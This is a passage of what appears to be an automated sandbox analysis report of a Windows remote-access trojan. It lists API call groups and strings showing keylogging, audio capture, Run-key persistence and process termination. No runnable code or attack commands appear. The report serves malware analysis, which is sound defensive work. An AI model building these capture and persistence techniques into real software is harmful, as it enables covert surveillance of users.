                        • _UnwindNestedFrames.LIBCMT ref: 00438134
                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                        • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                        Similarity
                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                        • String ID:
                        • API String ID: 737400349-0
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                        • GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                        • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                        Similarity
                        • API ID: File$CloseCreateHandleReadSize
                        • String ID:
                        • API String ID: 3919263394-0
                        APIs
                        • GetSystemMetrics.USER32(0000004C), ref: 00418529
                        • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                        • GetSystemMetrics.USER32(0000004E), ref: 00418535
                        • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                        Similarity
                        • API ID: MetricsSystem
                        • String ID:
                        • API String ID: 4116985748-0
                        APIs
                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                        Similarity
                        • API ID: CloseHandleOpenProcess
                        • String ID:
                        • API String ID: 39102293-0
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                        Strings
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        APIs
                        Strings
                        Similarity
                        • API ID: _memcmp
                        • String ID: 4[G$4[G
                        • API String ID: 2931989736-4028565467
                        APIs
                        Strings
                        Similarity
                        • API ID: CountEventTick
                        • String ID: >G
                        • API String ID: 180926312-1296849874
                        APIs
                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                        Strings
                        Similarity
                        • API ID: Info
                        • String ID: $vD
                        • API String ID: 1807457897-3636070802
                        APIs
                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                        Strings
                        Similarity
                        • API ID:
                        • String ID: ACP$OCP
                        • API String ID: 0-711371036
                        APIs
                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                        Strings
                        • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                        Similarity
                        • API ID: LocalTime
                        • String ID: KeepAlive | Enabled | Timeout:
                        • API String ID: 481472006-1507639952
                        APIs
                        • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        Strings
                        Similarity
                        • API ID: LocalTime
                        • String ID: | $%02i:%02i:%02i:%03i
                        • API String ID: 481472006-2430845779
                        APIs
                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        • CloseHandle.KERNEL32(?), ref: 0040A7CA
                        • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                        Strings
                        Similarity
                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                        • String ID: Online Keylogger Stopped
                        • API String ID: 1623830855-1496645233
                        APIs
                        • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                        • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                        Strings
                        Similarity
                        • API ID: wave$BufferHeaderPrepare
                        • String ID: T=G
                        • API String ID: 2315374483-379896819
                        APIs
                        • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                        Strings
                        Similarity
                        • API ID: LocaleValid
                        • String ID: IsValidLocaleName$z=D
                        • API String ID: 1901932003-2791046955
                        APIs
                        Strings
                        Similarity
                        • API ID: H_prolog
                        • String ID: T=G$T=G
                        • API String ID: 3519838083-3732185208
                        APIs
                        • GetKeyState.USER32(00000011), ref: 0040AD5B
                          • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                          • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                          • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                          • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                          • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                        Strings
                        Similarity
                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                        • String ID: [AltL]$[AltR]
                        • API String ID: 2738857842-2658077756
                        APIs
                        • _free.LIBCMT ref: 00448835
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        Strings
                        Similarity
                        • API ID: ErrorFreeHeapLast_free
                        • String ID: `@$`@
                        • API String ID: 1353095263-20545824
                        APIs
                        • GetKeyState.USER32(00000012), ref: 0040ADB5
                        Strings
                        Similarity
                        • API ID: State
                        • String ID: [CtrlL]$[CtrlR]
                        • API String ID: 1649606143-2446555240
                        APIs
                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                        • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                        Similarity
                        • API ID: DeleteOpenValue
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                        • API String ID: 2654517830-1051519024
                        APIs
                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                        Strings
                        Similarity
                        • API ID: DeleteDirectoryFileRemove
                        • String ID: pth_unenc
                        • API String ID: 3325800564-4028850238
                        APIs
                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                        • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                        Strings
                        Similarity
                        • API ID: ObjectProcessSingleTerminateWait
                        • String ID: pth_unenc
                        • API String ID: 1872346434-4028850238
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                        • GetLastError.KERNEL32 ref: 0043FB12
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast
                        • String ID:
                        • API String ID: 1717984340-0